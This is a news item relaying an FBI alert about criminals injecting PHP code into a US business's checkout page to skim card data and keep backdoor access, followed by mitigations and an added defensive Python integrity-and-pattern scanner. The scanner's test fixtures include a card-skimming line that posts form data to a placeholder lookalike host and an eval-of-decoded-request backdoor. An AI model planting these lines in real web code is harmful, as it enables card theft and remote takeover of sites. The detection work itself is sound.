Friday, April 19, 2024

Cyber Actors Scrape Credit Card Data from U.S. Business’ Online Checkout Page and Maintain Persistence by Injecting Malicious PHP Code

The FBI has identified and is sharing new indicators of compromise (IOCs), which may assist in network defense.

As of January 2022, unidentified cyber actors unlawfully scraped credit card data from a US business by injecting malicious PHP Hypertext Preprocessor (PHP) code into the business’ online checkout page and sending the scraped data to an actor-controlled server that spoofed a legitimate card processing server. The unidentified cyber actors also established backdoor access to the victim’s system by modifying two files within the checkout page.

Recommended Mitigations:

  • Update and patch all systems, to include operating systems, software, and any third-party code running as part of your website.
  • Change default login credentials on all systems.
  • Monitor requests performed against your e-commerce environment to identify possible malicious activity.
  • Segregate and segment network systems to limit how easily cyber criminals can move from one to another.
  • Secure all websites transferring sensitive information by using secure socket layer (SSL) protocol.
  • Install third-party software/hardware from trusted sources. Coordinate with the manufacturer to ensure their security protocols prevent unauthorized access to data they store and/or process.
  • Patch all systems for critical vulnerabilities, prioritizing timely patching of internet-connected servers for known vulnerabilities and software processing internet data, such as web browsers, browser plugins, and document readers.
  • Actively scan and monitor web logs and web applications for unauthorized access, modification, and anomalous activities.
  • Strengthen credential requirements and implement multifactor authentication to protect individual accounts.
  • Conduct regular backups to reduce recovery time in the event of a compromise or cyber intrusion.
  • Maintain an updated Incident Response Plan addressing cyber threat response.
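As an added example (not from the FBI alert or the HSToday article), the following Python script shows one way to implement the monitoring the alert recommends: hash the checkout-page files against a known-good baseline, then scan only the files that changed for constructs typical of the two behaviours described above, an injected handler that copies submitted form data to a second hard-coded host, and a backdoor that executes decoded request input. Every path, hash and PHP snippet is constructed for the example, and the `.invalid` host is a reserved placeholder rather than a real indicator.

```python
"""File-integrity and content check for checkout-page PHP files.

Added example: not part of the FBI alert or the HSToday article. It applies
two of the alert's mitigations (detect unauthorized modification of web
application files; scan them for anomalous code) to a constructed snapshot
of a webroot. Paths, hashes and PHP snippets are all constructed here, and
the '.invalid' host is a reserved placeholder, not a real indicator.
"""
import hashlib
import re


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed known-good files, as deployed from source control. In practice
# the baseline is built at deploy time and stored off the web server.
CLEAN_CHECKOUT = (
    b"<?php\n// constructed: legitimate checkout handler\n"
    b"$order = validate_order($_POST);\nredirect_to_processor($order);\n"
)
CLEAN_HELPER = b"<?php\n// constructed: helper\nfunction fmt($s) { return trim($s); }\n"
CLEAN_CONFIG = b"<?php\nreturn ['processor' => 'https://payments.example.com/api'];\n"

BASELINE = {
    "checkout/index.php": sha256_hex(CLEAN_CHECKOUT),
    "checkout/helper.php": sha256_hex(CLEAN_HELPER),
    "checkout/config.php": sha256_hex(CLEAN_CONFIG),
}

# Constructed tampered state mirroring the alert: the handler now forwards the
# submitted form to a second host that imitates the processor, and a helper
# has been turned into a backdoor that executes decoded request input.
TAMPERED_CHECKOUT = CLEAN_CHECKOUT + (
    b"$ch = curl_init('https://processor-lookalike.invalid/collect');\n"
    b"curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($_POST));\ncurl_exec($ch);\n"
)
BACKDOORED_HELPER = b"<?php\neval(base64_decode($_REQUEST['c']));\n"

CURRENT_FILES = {
    "checkout/index.php": TAMPERED_CHECKOUT,
    "checkout/helper.php": BACKDOORED_HELPER,
    "checkout/config.php": CLEAN_CONFIG,
}

# Constructs that are rarely legitimate in a checkout handler and that
# injected skimmers and PHP backdoors commonly rely on. Reported by name.
SUSPICIOUS_PATTERNS = {
    "eval_of_decoded_data": re.compile(
        r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "dynamic_call_on_request_input": re.compile(
        r"\$\w+\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I),
}
READS_FORM_INPUT = re.compile(r"\$_(POST|REQUEST)\b")
NETWORK_FUNCTION = re.compile(
    r"\b(curl_init|curl_exec|file_get_contents|fsockopen|stream_socket_client)\s*\(", re.I)
ABSOLUTE_URL = re.compile(r"['\"]https?://", re.I)


def scan_php(content: str) -> list[str]:
    """Return the names of suspicious constructs found in one PHP file."""
    findings = [name for name, pat in SUSPICIOUS_PATTERNS.items() if pat.search(content)]
    # A file that both reads submitted form fields and opens a connection to a
    # hard-coded URL is the shape of a skimmer copying card data elsewhere.
    if (READS_FORM_INPUT.search(content) and NETWORK_FUNCTION.search(content)
            and ABSOLUTE_URL.search(content)):
        findings.append("form_input_sent_to_hardcoded_url")
    return findings


def check_webroot(baseline: dict, current: dict) -> dict:
    """Diff current files against the baseline; content-scan only what changed.

    Unchanged files match a known-good hash and are not scanned, which keeps
    legitimate code (e.g. the real processor URL in config.php) out of the
    findings. Added and modified files are always scanned.
    """
    report = {"modified": [], "added": [], "removed": [], "findings": {}}
    for path, data in current.items():
        if path not in baseline:
            report["added"].append(path)
        elif baseline[path] != sha256_hex(data):
            report["modified"].append(path)
        else:
            continue
        findings = scan_php(data.decode("utf-8", errors="replace"))
        if findings:
            report["findings"][path] = findings
    report["removed"] = sorted(set(baseline) - set(current))
    for key in ("modified", "added"):
        report[key].sort()
    return report


if __name__ == "__main__":
    for key, value in check_webroot(BASELINE, CURRENT_FILES).items():
        print(f"{key}: {value}")
```

Run against the constructed snapshot, the script reports both PHP files as modified, attributes the form-to-URL pattern to the checkout handler and the eval-of-decoded-input pattern to the helper, and leaves the unchanged config file out of the findings. The pattern names are triage signals, not verdicts: the integrity diff is what establishes that a file was changed outside the deployment process, and the baseline hashes should live somewhere the web server cannot write.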

The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office. With regard to the specific information that appears in this communication, the context and individual indicators, particularly those of a nondeterministic or ephemeral nature (such as filenames or IP addresses), may not be indicative of a compromise. Indicators should always be evaluated in light of your complete information security situation.

Read more at IC3

Homeland Security Today
The Government Technology & Services Coalition's Homeland Security Today (HSToday) is the premier news and information resource for the homeland security community, dedicated to elevating the discussions and insights that can support a safe and secure nation. A non-profit magazine and media platform, HSToday provides readers with the whole story, placing facts and comments in context to inform debate and drive realistic solutions to some of the nation’s most vexing security challenges.